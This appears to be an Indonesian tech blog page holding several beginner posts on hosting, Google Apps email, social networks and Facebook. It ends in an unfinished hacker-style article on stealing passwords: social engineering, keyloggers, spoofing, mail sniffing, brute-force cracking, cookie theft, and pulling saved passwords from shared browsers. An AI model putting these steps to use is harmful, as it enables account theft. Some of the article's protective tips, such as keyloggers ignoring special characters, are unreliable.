a. Kelebihan Wi-fi
Label: hack, pengetahuan teknologi
- File tidak terupload ke direktori public_html
Semua file website dan folder harus berada dibawah direktori public_html (atau lengkapnya/home/username/public_html). Di luar direktori tersebut file website tidak akan dapat ditampilkan. Pastikan Anda telah masuk ke direktori public_html dahulu baru mengupload file.
Jika menggunakan FTP, pertama kali setelah software FTP Anda terkoneksi dengan server web hosting, direktorinya adalah /home/username/. Anda perlu mengklik folder public_html dahulu agar bisa masuk ke /home/username/public_html. - Tidak ada file index
Nama file yang pertama kali akan ditampilkan sebagai halaman depan haruslah index.* (index.htm, index.html, atau index.php). Tanpa file index, halaman depan website Anda tidak akan muncul. - Penulisan nama file index salah
Masih berkaitan dengan point 2 di atas, bisa jadi Anda telah mempiliki file index. Akan tetapi penamaannya salah (mengandung huruf kapital). Nama file index harus dalam huruf kecil. Contoh nama file yang benar :index.html / index.htm bukan Index.html / index.HTM - Software yang digunakan untuk mendesain web tidak memenuhi syarat
Meskipun tidak selalu terjadi, kadang – kadang apabila Anda membuat website dengan Microsoft Publisher, hasil output file html dari software tersebut tidak standard. Ukurannya cenderung membengkak, atau menggunakan tag (kode) html yang tidak standard. Hal ini menyebabkan website Anda tidak dapat tampil.
Gunakan software yang memang diperuntukkan pembuatan website seperti Macromedia / Adobe Dreamweaver dan Microsoft Frontpage.
Label: pengetahuan teknologi
Bagaimana anda membayangkan ponsel di masa depan? ada beberapa orang yang telah merancang tentang konsep ponsel in the future, ada yang desain-nya artistik, ada juga yang mendesain ponsel yang dilengkapi dengan fitur canggih, seperti bisa di bongkar pasang (seperti puzzle), layar yang bisa dilipat (ponsel origami), dan lain-lain
Teknologi ponsel memang berkembang dengan cepat, 10 tahun yang lalu mungkin anda tidak terfikir bahwa ponsel bisa Video call, MMS, Internet dan lain-lain. Begitu juga dengan masa depan, fitur yang ditawarkan sangat diluar imajinasi kita.
Berikut screenshot rancangan ponsel masa depan diambil dari situs BBC dan sumber lain








Label: hp, pengetahuan teknologi
Di era internet sekarang, hampir semua orang memiliki akun jejaring sosial. Jejaring sosial adalah situs yang memungkinkan kita membuat komunitas di dunia maya, bertukar informasi, foto, dan komentar.
Situs jejaring sosial sebenarnya telah muncul sejak 1997, di awali dengan situs www.sixdegrees.com. Situs ini memiliki aplikasi untuk membuat profil, menambah teman, dn mengirim pesan. Hingga di tahun 2002 muncul friendster, yang semula di sediakan untuk tempat pencarian jodoh. Friendster kemudian menjadi situs jejaring paling popular sampai kemunculan MySpace, Facebook, dan Twitter.
Saat ini sudah banyak sekali situs jejaring sosial yang bisa kamu pilih sesuai kebutuhan, dan fiturnya juga semakin beragam.
Bisa di bilang Facebook adalah yang paling popular saat ini, dengan jumlah pengguna mencapai 500 juta orang. Pengakses situs ini bisa menjalin pertemanan, bergabung ke grup atau komunitas sosial, mengirim message, mengubah video dan foto, menulis blog, main game, dan update status.
MySpace
Fungsi MySpace tidak jauh berbeda dengan situs jejaring lain, tapi ada satu fungsi yang menonjol, yaitu sarana untuk para musisi memperkenalkan karyanya.
Ini dia situs jejaring yang sedang naik daun saat ini. Twitter lebih sederhana dibandingkan Facebook. Fungsi awalnya adalah penyebaran berita dengan cepat, tetapi saat ini banyak di gunakan sebatas update status saja.
Foursquare
Fungsi forsquare adalah update lokasi, semakin sering check in di satu lokasi, pengguna bisa mendapat posisi sebagai mayor di lokasi tersebut. Update Foursquare biasanya terhubung dengan Twitter atau Facebook.
Plurk
Fungsi utama Plurk juga untuk update status dengan tampilan time line memanjang. Keistimewaannya kita bisa memilih awalan status kita seperti ” feel “, ” say “, ” ask “,dll. Selain itu Plurk semakin banyak emoticon yang bisa di pakai.
Linkedln
Situs ini adalah jejaring sosial berbasis bisnis dan profesional. Lewat Linkedln pengguna bisa saling bertukar ide, pengetahuan serta berbagi bursa kerja dengan jaringan profesional yang sangat besar.
Goodreads
Situs ini cocok bagi anda yang hobi membaca. Fitur utamanya adalah tentang buku apa saja yang sudah pernah di baca oleh penggunanya.
Flixster
Fungsinya sama dengan goodreads, bedanya adalah sarana untuk sharing tentang film.
Yahoo ! Koprol
Koprol adalah jejaring sosial yang baru-baru ini ramai. Didirikan oleh orang indonesia, namun sekarang koprol di beli oleh Yahoo ! situs ini sama fungsinya dengan facebook, yang menarik dari Koprol adalah kita bisa menentukan lokasi tempat yang kita inginkan untuk update status. Dilengkapi juga dengan google maps, untuk mengetahui lokasi teman !
Label: facebook, pengetahuan teknologi
01 Cara Membuat Alamat Email Dengan Domain Sendiri
Google Apps merupakan sebuah layanan yang di berikan oleh Google kepada seluruh pengguna internet untuk mendapatkan fitur Gmail, Google Documents, Google Sites, dan banyak lagi dengan domain sendiri. Hanya perlu daftar, konfigurasi dan email siap digunakan untuk semua fitur Google. Dan yang paling menarik yaitu, server dari Google hampir 100% uptime, tidak pernah down, selain itu Google Apps GRATIS.
Ada 3 jenis layanan yang diberikan oleh Google Apps, yaitu:
- Google Apps (individuals, groups and entrepreneurs, maksimal 50 akun email)
- Google Apps for Business (berbayar, $50 per user per tahun, Full Control dan Fiturnya banyak)
- Google Apps for Education (untuk Pendidikan)
Untuk lebih jelasnya silahkan kunjungi http://www.google.com/apps/.
Langsung saja pada tahapan pembuatan alamat email dengan domain sendiri, berikut langkah-langkahnya:
- Buka situs Google Apps di http://www.google.com/apps/
- Disana tertera 3 pilihan Google Apps, pilih yang pertama (Google Apps), klik “learn more“
- Selanjutnya, pada sebelah kanan situs, klik “Get Started“
- Masukan nama Domain sobat, tanpa www, misalnya: bloggernesia.co.cc, kemudian klik “Get Started“
- Pada tahapan selanjutnya, sobat diminta untuk mengisi informasi tentang diri sobat. Isikan saja semua dengan benar, yang wajib di isi adalah yang memiliki tanda bintang (*), selain itu tidak di isi tidak apa-apa dan jangan lupa memberikan tanda centang pada “I understand that if I cannot alter DNS records for my domain, I may impact my organization’s ability to use Google Apps.“, jika sudah, klik “Continue“
- Langkah selanjutnya yaitu sobat diminta untuk mengisi form tentang akun administrator yang akan memanajemen seluruh akun yang ada. Isikan dengan benar. Jika sudah, scrol kebawah, dan klik tombol “I accept. Continue with setup“
- Selamat, akun Google Apps telah berhasil dibuat. Tetapi belum bisa dipergunakan untuk fitur-fitur yang disediakan, apalagi layanan email. Sobat perlu konfirmasi kepemilikan nama domain, dan konfigurasi MX Server Address di cPanel hosting.
Selanjutnya adalah konfirmasi nama domain, agar layanan Google Apps dengan domain yang didaftarkan tadi dapat aktif dan sobat dapat memanfaatkan berbagai fitur yang diberikan. Berikut langkahnya:
- Pilih tab “Setup“, klik “next” terus sampai muncul halaman seperti berikut:
02 Cara Membuat Alamat Email Dengan Domain Sendiri
- Pilih metode konfirmasi kepemilikan domain yang anda inginkan. Disini saya memilih “Upload an HTML file to your server“, download file yang sudah disediakan, lalu upload file tersebut ke hosting (nomor 1), lebih tepatnya letakan di path “public_html” atau jika domain sobat adalah domain addons, maka letakkan saja di folder domain addons tersebut, yang penting kalau di akses menjadi http://domain.com/file.html. Selanjutnya coba akses file tersebut dengan klik link yang ada pada nomor 3.
- Jika file berhasil di akses, maka langkah selanjutnya yaitu klik tombol “Verify“.
- Selamat, dalam beberapa menit domain sobat akan aktif. Menunggu resolved saja dari system Google Apps, dan fitur yang diberikan dapat sobat pergunakan, kecuali layanan email, karena perlu konfigurasi MX Server Address di cPanel Hosting.
Baiklah, sekarang langkah terakhir, yaitu mengaktifkan fitur webmail, agar sobat bisa mengirim dan menerima email. Berikut langkah-langkahnya:
03 Cara Membuat Alamat Email Dengan Domain Sendiri
- Pilih tab Dashboard, pada bagian bawah, sobat akan menemukan informasi seperti pada gambar diatas. Itu berarti fitur email belum di aktifkan, untuk mengaktifkan, klik “Activate email“
- Pada tahapan selanjutnya sobat diminta untuk melakukan konfigurasi MX Records (MX Entry) pada cPanel hosting.
- Sekarang, coba kembali ke cPanel hosting, kemudian cari menu “Mail” > “MX Entry“
04 Cara Membuat Alamat Email Dengan Domain Sendiri
- Pilih nama domain yang tadi sobat daftarkan di Google Apps. Pada bagian bawah, defaultnya akan ada 1 MX Record yang tersedia, hapus MX Record tersebut.
- Setelah itu, add MX Records baru sesuai dengan apa yang diperintahkan oleh Google Apps, berikut data yang harus sobat tambahkan:
05 Cara Membuat Alamat Email Dengan Domain Sendiri
- Pada saat mengisi informasi, hilangkan tanda titik (.) yang terakhir pada MX Server address. Sebagai contoh, saya mengisinya begini:
06 Cara Membuat Alamat Email Dengan Domain Sendiri
- Sampai muncul tanda centang hijau, itu baru benar, dan klik tombol “Add New Record”
- Lakukan sampai selesai, ada 7 MX Server Address dan seharusnya menjadi seperti berikut:
07 Cara Membuat Alamat Email Dengan Domain Sendiri
- Jika sudah, sekarang kembali ke halaman Google Apps tadi, dan klik tombol “I have completed these steps“.
- Proses update MX Server Address, memerlukan waktu sekitar 48 jam, menurut System, tetapi kemungkinan kurang dari 24 jam saja sudah aktif, jadi tunggu saja. Jika sudah aktif, email sudah siap digunakan. Proses updating sedang berlangsung, berikut gambarnya:
08 Cara Membuat Alamat Email Dengan Domain Sendiri
Selesai sudah Cara Membuat Alamat Email Dengan Domain Sendiri. Silahkan pergunakan dengan bijaksana. Sekian, maaf jika tutornya membingungkan, selamat mencoba.
Apa itu website? Apa itu blog?
Di blog ini akan di jelaskan sedikit perbedaan tentang pengertian website dan blog
Situs web atau dalam bahasa inggrisnya Web Site atau singkatannya site bukan hal yang aneh di dengar, situs web atau web site adalah sebutan untuk sekelompok halaman web (web page) yang biasanya kita tulis dengan awalan World Wide Web(WWW) di internet serta di akhiri dengan nama domain (domain name) web tersebut.
Secara terminologi, website adalah kumpulan dari halaman-halaman situs, yang biasanya terangkum dalam sebuah domain atau subdomain, yang tempatnya berada di dalam World Wide Web (WWW) di Internet. Sebuah halaman web adalah dokumen yang ditulis dalam format HTML (Hyper Text Markup Language), yang hampir selalu bisa diakses melalui HTTP (Hypertext Transfer Protocol), yaitu protokol yang menyampaikan informasi dari server website untuk ditampilkan kepada para pemakai melalui web browser. Semua publikasi dari website-website tersebut dapat membentuk sebuah jaringan informasi yang sangat besar.
Halaman-halaman dari website akan bisa diakses melalui sebuah URL yang biasa disebut Homepage. URL merupakan singkatan dari Uniform Resource Locator, adalah rangkaian karakter menurut suatu format standar tertentu, yang digunakan untuk menunjukkan alamat suatu sumber – seperti dokumen dan gambar – di Internet. URL ini mengatur halaman-halaman situs untuk menjadi sebuah hirarki, meskipun, hyperlink-hyperlink yang ada di halaman tersebut mengatur para pembaca dan memberitahu mereka sususan keseluruhan dan bagaimana arus informasi ini berjalan.
Blog merupakan singkatan dari “web log“ adalah bentuk aplikasi web yang menyerupai tulisan-tulisan (yang dimuat sebagai posting) pada sebuah halaman web umum. Tulisan-tulisan ini seringkali dimuat dalam urut terbalik (isi terbaru dahulu baru kemudian diikuti isi yang lebih lama), meskipun tidak selamanya demikian. Situs web seperti ini biasanya dapat diakses oleh semua pengguna internet sesuai dengan topik dan tujuan dari si pengguna blog tersebut.
Media blog pertama kali dipopulerkan oleh Blogger.com, yang dimiliki oleh PyraLab sebelum akhirnya PyraLab diakuisi oleh Google.Com pada akhir tahun 2002 yang lalu. Semenjak itu, banyak terdapat aplikasi-aplikasi yang bersifat sumber terbuka yang diperuntukkan kepada perkembangan para penulis blog tersebut.
Blog mempunyai fungsi yang sangat beragam,dari sebuah catatan harian, media publikasi dalam sebuah kampanye politik, sampai dengan program-program media dan perusahaan-perusahaan. Sebagian blog dipelihara oleh seorang penulis tunggal, sementara sebagian lainnya oleh beberapa penulis, . Banyak juga weblog yang memiliki fasilitas interaksi dengan para pengunjungnya, seperti menggunakan buku tamu dan kolom komentar yang dapat memperkenankan para pengunjungnya untuk meninggalkan komentar atas isi dari tulisan yang dipublikasikan.
Ngeblog (istilah bahasa Indonesia untuk blogging) harus dilakukan hampir setiap waktu untuk mengetahui eksistensi dari pemilik blog. Juga untuk mengetahui sejauh mana blog dirawat (mengganti template) atau menambah artikel. selain merawat dan terus melakukan pembaharuan di blognya, para blogger yang tergolong baru pun masih sering melakukan blogwalking, yaitu aktivitas dimana para blogger meninggalkan link di blog atau situs orang lain seraya memberikan komentar. Beberapa blogger kini bahkan telah menjadikan blognya sebagai sumber pemasukan utama. Sehingga kemudian muncullah istilah profesional blogger, atau problogger, orang yang menggantungkan hidupnya hanya dari aktivitas ngeblog.
Label: pengetahuan teknologi
Penyebab Di Blokir ( Banned ) id Facebook>Tutorial Facebook Up To Date
penyebab-penyebab mengapa facebook kita di blokir. Ternyata faktor penyebab dari terblokirnya facebook bisa datang dari luar (external) maupun dalam (internal). Apa saja sih penyebab facebook kita di blokir ? Penasaran ? Mau ?
Faktor external terblokirnya facebook
1. Mungkin anda pekerja atau mahasiswa, dimana peraturan di kantor/kampus itu tidak boleh membuka situs facebook.
2. Mungkin facebook anda di hack sama orang lain.
Faktor internal terblokirnya facebook
1. Terlalu sering menambah (nge-add) teman dalam satu hari. Perlu diketahui, penambahan teman di facebook itu di batasi.
2. Terlalu banyak mengirimkan/menyebarkan link secara berlebihan (spam) baik di dinding, pesan, group atau pun pada saat chatting.
3. Link atau tulisan yang anda kirim bersifat rasis, fitnah, penghinaan, pornografi, dll. contoh anda mengirimkan youporn.com
4. Terlalu banyak mencolek teman (poke).
5. Link atau tulisan yang anda kirim, di kirim secara copy paste.
6. Penggunaan nama palsu.
7. Usia anda di bawah 18 tahun.
8. Mengiklankan aplikasi facebook di dinding facebook orang lain.
9. Terlalu banyak join di group facebook.
10. Ketidaklayakan foto yang anda pakai.
Untuk sementara segitu dulu. Kalau ada yang mau menambahkan, silahkan !! ^_^
Label: facebook, pengetahuan teknologi
facebookDalam Fb memang tidak ada fitur resmi untuk membuat blog. Tetapi berkat aplikasi buatan para pengguna Fb, terdapat beberapa aplikasi blog yang siap digunakan dalam pembuatan blog dalam Fb. Meski beberapa diantaranya masih dalam tahap pengembangan lebih lanjut, tapi tidak ada salahnya untuk dicoba.
Langkah 1
Dalam keadaan anda sudah logged in ke dalam account Fb anda, cobalah untuk memasukkan blog pada bagian search untuk mencari aplikasi blog yang tersedia.
Langkah 2
akan muncul beberapa aplikasi blog yang dibuat oleh pihak yang berbeda. Kali ini pilihlah yang merupakan buatan Shujaat Bin Tariq dengan ikon B berwarna biru. Klik (View Application).
Langkah 3
Selanjutnya akan muncul halaman utama aplikasi Blog tersebut. Klik [ Go to to Application ]
Langkah 4
Kemudian Anda akan mendapatkan beberapa blog yang telah dipublikasikan oleh pengguna Fb lainnya dengan aplikasi yang sama. Di halaman ini juga terdapat link untuk membuat blog pertama anda. Klik [Create New Blog Entry]
Langkah 5
Sebelum anda dapat membuat sebuah blog entry baru, anda harus mengaktifkan Face Blog. Klik [Add Face Blog].
Langkah 6
Di halaman berikutnya anda akan diminta konfirmasi untuk memberikan akses untuk tampilan profil dan segala sesuatu yang berkenaan dengan data diri anda di Facebook. Klik [Allow].
Langkah 7
Anda akan menjumpai kembali tampilan halaman yang sama dengan sebelumnya. Klik [Create New Blog Entry].
Langkah 8
Ada baiknya anda membuat kategori terlebih dahulu untuk membuat blog Anda menjahdi lebih rapi berdasarkan topik2 berbeda yang anda buat. Untuk itu klik tab [Categories] lalu [Add New Category].
Langkah 9
Pada dialog box [Add New Category], berikan nama untuk kategori tersebut pada bagian [Title]. Untuk [Description] berikan penjelasan singkat mengenai kategori tersebut, atau bisa juga anda tinggalkan dalam keadaan kosong. Klik [Add].
Langkah 10
sejurus kemudian kategori baru yang telah anda buat kini sudah tercantum di dalam blog anda.
Langkah 11
Anda bisa membuat beberapa kategori lainnya dengan cara yang sama. Jika demikian, maka nantinya di bagian Categories akan muncul nama-nama kategori yang telah Anda buat. Kali ini anda harus bisa membuat blog entry dengan mengklik [Create New Blog Entry].
Langkah 12
Sebenarnya untuk aplikasi blog buatan Shujaat Bin Tariq ini memiliki fitur WYSIWYG editor, namun saat artikel ini disusun ternyata masih terdapat perbaikan. Karena itu kali ini tampilannya tak ubahnya dengan basic editor. Masukkan nama judul pada title dan pilih kategori yang anda inginkan.
Langkah 13
Anda bisa memasukkan artikel blog anda di bagian yang telah disediakan, sayangnya kali ini fitur WYSIWYG editor masih belum berfungsi. Tetapi anda bisa menyertakan link video youtube disini.
Langkah 14
Untuk memasukkan video dari youtube, cari video yang anda cari menggunakan fasiltas search di youtube.
Langkah 15
Setelah anda mendapatkan hasil dari pencarian video, klik salah satu yang anda inginkan. Lalu copy alamat URL dari video tersebut.
Langkah 16
Masukkan URL dari video yang anda dapatkan dari youtube di bagian video URL.
Langkah 17
Setelah semuanya anda yakini telah terisi dengan benar, klik [Publish].
Langkah 18
Kemudian anda akan dapatkan pesan bahwa blog anda telah selesai dibuat.
Alternatif lainnya blog di Facebook adalah sama dengan cara pertama, klik ‘Blog’ pada bagian search didalam fb. Pilihlah aplikasi blog urutan kedua yang dibuat oleh Alastair Paterson. Caranya mudah saja ko, tinggal anda ikutin saja.
Akhirnya, selamat anda sudah punya Blog di Facebook. Silahkan mencoba dengan yang lainnya.
Label: facebook, pengetahuan teknologi
: Table oF Contents :
---------------------
0 [0XFF00000] Preface
0 [0XFFF0000] Bagaimana Mendapatkannya?
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
0 [0XFFFF000] Penutup
0 [0XFFFFF00] Referensi
0 [0XFFFFFF0] Shoutz
0 [0XFFFFFFF] Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]
0 [0XFF00000] Preface
Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. "Bagaimana cara mendapatkan password
email orang lain?" atau pertanyaan yang paling sering saya terima ialah..
"Bagaimana cara anda mendapatkan password saya?" :P
Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.
0 [0XFFF0000] Bagaimana Mendapatkannya?
Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
[1]. Social Engineering
Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
"penipuan" :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.
Social Engineering merupakan seni "memaksa" orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja "pemaksaan" yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.
Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.
# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]
[2]. KeyLogger
KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.
[3]. Web Spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).
Baca artikel terkait pada arsip lama :)
[5]. Password Cracking
"Hacking while sleeping." itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute - force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.
Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri
aplikasinya di halaman Member - spyrozone.net.
[6]. Session Hjacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:
1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : "HACKED", "DEFACED", "OWNED".. dll.. Jika ragu-ragu....... reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.
Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.
[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser
Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools ---> Internet options
---> Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file "sampah"?? Hmm... sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools ---> Options --->
Security --> Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi... kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi "YES".
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It's fun
enough.. ;)
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling
Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
